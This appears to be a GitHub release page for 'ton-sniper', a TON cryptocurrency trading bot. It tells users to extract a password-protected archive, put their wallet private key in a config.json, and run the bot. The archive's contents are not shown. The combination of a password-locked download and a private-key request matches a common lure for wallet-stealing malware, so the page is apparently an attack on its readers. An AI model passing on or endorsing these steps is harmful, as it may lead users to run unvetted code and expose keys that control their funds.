Skip to content

Releases: knightlightst/ton-sniper

Ton-Sniper-1.1

24 Mar 22:25
d3f9d34
Compare
Choose a tag to compare

Installation

  • Download the repository.
  • Extract archive with pass Io1K2.
  • Create a config.json file.
  • Run the bot.

Config.json

{
  "NodeUrl": "https://main.ton.dev",
  "PrivateKey": "your_private_key",
  "TargetAddress": "target_address",
  "TargetAmount": 1000
}